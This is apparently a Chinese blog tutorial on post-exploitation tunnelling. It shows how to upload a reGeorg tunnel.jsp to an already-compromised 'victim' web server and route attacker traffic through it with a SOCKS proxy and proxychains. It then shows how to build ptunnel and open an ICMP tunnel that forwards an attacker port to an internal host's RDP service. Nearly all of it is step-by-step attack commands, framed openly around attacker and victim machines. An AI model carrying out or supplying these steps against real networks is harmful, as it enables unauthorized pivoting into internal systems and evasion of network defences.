基于HTTP协议
reGeorg搭建HTTP隧道
1 配置服务端
下载reGeorg
git clone https://github.com/sensepost/reGeorg.git
在已经getshell的受害者服务器上的http服务器的web根目录上传一个tunnel.jsp传完后,
测试是否可以访问到
curl http://服务端ip:8080/tunnel.jsp
服务器返回Georg says, 'All seems fine'
服务器端配置完成
2、在攻击者机子上,下载reGeorg运行脚本,设置一个端口3333作为http隧道的端口
python reGeorgSocksProxy.py -l 0.0.0.0 -p 3333 -u http://x.x.x.x:8080/tunnel.jsp
3、打开kali攻击机的proxychain设置,设置一下代理。将代理设置为vps的ip的3333端口
vim/etc/proxychains.conf
在最后添加一条
socks5 本地ip 3333
在kali上通过代理访问内网的服务器
proxychains curl http://172.17.0.2/login.php
基于ICMP协议
pingtunnel搭建icmp隧道
下载Pingtunnel:
wget http://www.cs.uit.no/~daniels/PingTunnel/PingTunnel-0.72.tar.gz
tar -xzvf PingTunnel-0.72.tar.gz
cd PingTunnel
make && make install
如果发生pcap.h缺失的错误:
wget http://www.tcpdump.org/release/libpcap-1.9.0.tar.gz
tar zxvf libpcap-1.9.0.tar.gz
cd libpcap-1.9.0
./configure
如果再发生Neither flex nor let was found,需要安装libcap依赖的环境
Kali:apt-get install flex bison
Centos7:yum install flex bison
在当前目录重新执行
./configure
make
sudo make install
回到Pingtunnel目录,重新执行
make && make install
搭建隧道
在目标服务器执行
ptunnel -x client
在攻击机上执行:
ptunnel -p 目标服务器ip -lp 1080 -da 内网ip -dp 3389 -x client
命令解读:
#-p 指定ICMP隧道另一端机器的IP
#-lp:指定本地监听的端口
#-da:指定要转发的目标机器的IP
#-dp:指定要转发的目标机器的端口
#-x:指定连接密码
连接攻击机的1080端口,相当于连接内网数据库服务器的3389
参考

2009

被折叠的 条评论
为什么被折叠?



